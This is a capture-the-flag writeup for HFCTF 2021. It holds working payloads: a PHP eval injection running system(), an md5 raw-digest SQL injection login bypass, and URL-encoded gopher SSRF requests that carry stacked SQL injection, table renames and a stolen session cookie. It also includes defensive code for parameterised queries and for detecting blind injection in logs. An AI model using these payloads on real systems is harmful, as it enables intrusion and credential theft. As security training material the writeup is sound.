HFCTF 2021 (虎符CTF) partial writeup
WEB
Sign-in (签到)
Before the hint was released this was a fake sign-in; after the hint it became the real one.
The news had come out just a few days earlier reporting a backdoor, so just look up the news and the code from that time.
The malicious RCE; how it is used:
Just fire it.
Command execution; cat /flag is enough.
unsetme
Search for the corresponding code to identify the PHP template engine the challenge uses.
Pull the code down from GitHub, open base.php, and look at where unset appears.
Here there is a call to eval(). Combined with the surrounding code, if we want to control eval to get code execution we need to close the preceding array and the unset, and comment out what follows:
:[]);system("whoami");//
The code executes and we get the flag.
"Slowly Do It" (慢慢做) management system
A fairly interesting challenge; the challenge description matters a lot.
According to the hint, the first step's SQL injection has to go through md5, similar to the 实验吧 (shiyanbar) challenge. The shiyanbar payload is blocked here, but we can use another one:
username=admin&password=129581926211651571912466741651878684928
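Why this particular password works, and what the fix looks like, as an added example written for this writeup (not code from the challenge): the challenge pattern is PHP's md5($pass, true) concatenated into the query, so the 16 raw digest bytes are spliced into the SQL as-is. The constant below is the payload quoted above; the DB-API placeholder style and the table name are assumptions.

```python
import hashlib
import string

# The payload quoted in the writeup above.
PAYLOAD = "129581926211651571912466741651878684928"


def raw_md5_as_php_string(value: str) -> str:
    """Emulate PHP's md5($value, true): the 16 raw digest bytes used as a
    byte string. Decoded as latin-1 so every byte maps to one character."""
    return hashlib.md5(value.encode()).digest().decode("latin-1")


def vulnerable_query(username: str, password: str) -> str:
    """The string-concatenated query shape these challenges use (assumed table
    name 'admin'). Shown only to illustrate why the raw digest breaks out."""
    return (
        "SELECT * FROM admin WHERE username='" + username
        + "' AND password='" + raw_md5_as_php_string(password) + "'"
    )


def raw_digest_breaks_out(password: str) -> bool:
    """Defensive check: does the raw digest contain a single quote that would
    close the SQL string literal? Any raw binary digest can, by chance."""
    return "'" in raw_md5_as_php_string(password)


def hardened_query_params(username: str, password: str):
    """Hardened form: a hex digest (only [0-9a-f]) bound as a parameter instead
    of concatenated. Returns (sql, params) for cursor.execute(sql, params).
    (md5 is still not a proper password hash; the point here is binding.)"""
    digest_hex = hashlib.md5(password.encode()).hexdigest()
    return ("SELECT * FROM admin WHERE username=%s AND password=%s",
            (username, digest_hex))


def digest_is_quote_safe(password: str) -> bool:
    """True when the bound value can only contain hex characters."""
    sql, params = hardened_query_params("admin", password)
    return all(c in string.hexdigits for c in params[1]) and "'" not in sql


if __name__ == "__main__":
    print(repr(raw_md5_as_php_string(PAYLOAD)))
    print(vulnerable_query("admin", PAYLOAD))
    print(hardened_query_params("admin", PAYLOAD))
```

Running it shows the raw digest contains the characters 'or' followed by a digit, which turns the WHERE clause into ... AND password='...' or '8...' and makes it true in MySQL's loose string-to-number comparison; the hex digest can never contain a quote.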
Once inside, it tells us we need to submit a gopher URL.
Since this is SSRF, we use the gopher protocol to hit the internal service and inject there. There is a POST form on admin.php, so construct the POST request:
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=admin' or 1=1 #&password=123
Convert it into a gopher payload; the substitution is done with Python (Python 3; the blank line between headers and body and the trailing blank line are required, as the encoded output below shows):
from urllib.parse import quote

test = """POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=admin' or 1=1 #&password=123

"""
# first encoding, then turn LF into CRLF line endings
tmp = quote(test)
new = tmp.replace('%0A', '%0D%0A')
# second encoding: the gopher URL is itself submitted through a form
result = '_' + quote(new)
# result = '_' + new
common = "gopher://127.0.0.1:80/"
print(quote(common) + result)
Constructed:
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252037%250D%250A%250D%250Ausername%253Dadmin%2527%2520or%25201%253D1%2520%2523%2526password%253D123%250D%250A%250D%250A
Submit and look at the result.
The data is output as an array, so we guess stacked injection is possible; construct the payload:
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252045%250D%250A%250D%250Ausername%253Dadmin%2527%253Bshow%2520databases%253B%2523%2526password%253D123%250D%250A%250D%250A
Three databases exist.
Look at the tables in ctf2:
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252051%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Bshow%2520tables%253B%2523%2526password%253D123%250D%250A%250D%250A
Testing shows keywords such as select and prepare are filtered, so we use the approach from the 2019 QWB (强网杯) challenge: rename the tables to read the data.
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
username=admin';use ctf2;rename table `fake_admin` to `fake_admin1`;rename table `real_admin_here_do_you_find` to `fake_admin`;#&password=123
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%2520141%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Brename%2520table%2520%2560fake_admin%2560%2520to%2520%2560fake_admin1%2560%253Brename%2520table%2520%2560real_admin_here_do_you_find%2560%2520to%2520%2560fake_admin%2560%253B%2523%2526password%253D123%250D%250A%250D%250A
Use the universal password again to view the contents.
We get the password. Read the question carefully here: it says to submit the password of the real admin, so the username we log in with is admin and the password is the one just obtained. Construct:
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250D%250A%250D%250A
A cookie and a 302 redirect appear; add the cookie to our constructed HTTP headers and access flag.php:
GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=ttmid17emjg67vco1bn5db45l7;
gopher%3A//127.0.0.1%3A80/_GET%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250ACookie%253A%2520PHPSESSID%253Dttmid17emjg67vco1bn5db45l7%253B%250D%250A%250D%250A
Flag obtained.
Misc
Can you do log analysis? (你会日志分析吗)
A fairly basic blind-injection log audit. First read the SQL statement carefully.
It is time-based blind injection: if the ASCII value of the flag character at that position equals the value after the equals sign, i.e. the condition is true, sleep(2) runs; otherwise it does not. So the approach is simple: judge by the change in timing, or by the response length being 377. The data extracted at the end is base64-encoded:
ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0eQ==
#flag{You_are_so_great}
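The audit described above, as an added example written for this writeup rather than the challenge's own log or solver: parse access-log lines, pick out the time-based probe requests, and reconstruct what was exfiltrated from the response-length marker (377 bytes for the true branch, as the writeup says). The log lines are constructed here and cover only the first four characters; the probe shape, IPs, timestamps and paths are assumptions.

```python
import base64
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log style, not the challenge's log:
# one character of the secret is probed per request; the "true" branch returns a
# 377-byte body, other guesses return the normal page (2310 bytes). A benign
# request from another host is mixed in.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2021:09:00:01 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),1,1))=89,sleep(2),1) HTTP/1.1" 200 2310
10.0.0.5 - - [10/Apr/2021:09:00:01 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),1,1))=90,sleep(2),1) HTTP/1.1" 200 377
10.0.0.9 - - [10/Apr/2021:09:00:02 +0800] "GET /index.php?id=1 HTTP/1.1" 200 2310
10.0.0.5 - - [10/Apr/2021:09:00:04 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),2,1))=108,sleep(2),1) HTTP/1.1" 200 2310
10.0.0.5 - - [10/Apr/2021:09:00:04 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),2,1))=109,sleep(2),1) HTTP/1.1" 200 377
10.0.0.5 - - [10/Apr/2021:09:00:07 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),3,1))=119,sleep(2),1) HTTP/1.1" 200 2310
10.0.0.5 - - [10/Apr/2021:09:00:07 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),3,1))=120,sleep(2),1) HTTP/1.1" 200 377
10.0.0.5 - - [10/Apr/2021:09:00:10 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),4,1))=103,sleep(2),1) HTTP/1.1" 200 2310
10.0.0.5 - - [10/Apr/2021:09:00:10 +0800] "GET /index.php?id=1%20and%20if(ascii(substr((select%20flag%20from%20flag),4,1))=104,sleep(2),1) HTTP/1.1" 200 377
"""

TRUE_BODY_LEN = 377  # response length of the "condition true" branch (from the writeup)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
# matches the tail of substr(<expr>,<pos>,1))=<ascii code> after URL decoding
PROBE_RE = re.compile(r",(?P<pos>\d+),1\)\)=(?P<code>\d+)")


def parse_probes(log_text):
    """Return (ip, position, ascii_code, response_size) for each probe request;
    non-matching lines (normal traffic) are skipped."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        p = PROBE_RE.search(unquote(m["path"]))
        if not p:
            continue
        size = -1 if m["size"] == "-" else int(m["size"])
        probes.append((m["ip"], int(p["pos"]), int(p["code"]), size))
    return probes


def recover_exfiltrated(log_text, true_len=TRUE_BODY_LEN):
    """Rebuild the extracted string: for every position keep the guess whose
    response had the 'true' length. Missing positions are simply absent."""
    chars = {}
    for _ip, pos, code, size in parse_probes(log_text):
        if size == true_len:
            chars[pos] = chr(code)
    return "".join(chars[i] for i in sorted(chars))


def probe_counts_by_ip(log_text):
    """Detection view: how many blind-injection probes each client sent."""
    return Counter(ip for ip, *_ in parse_probes(log_text))


if __name__ == "__main__":
    recovered = recover_exfiltrated(SAMPLE_LOG)
    print(recovered, base64.b64decode(recovered + "=" * (-len(recovered) % 4)))
    print(probe_counts_by_ip(SAMPLE_LOG))
```

The same reconstruction works against the full challenge log once the regex matches its exact probe shape; if the log records timings instead of sizes, swap the size test for a threshold on the duration field. Counting probes per source IP is also the cheapest alert rule for this pattern.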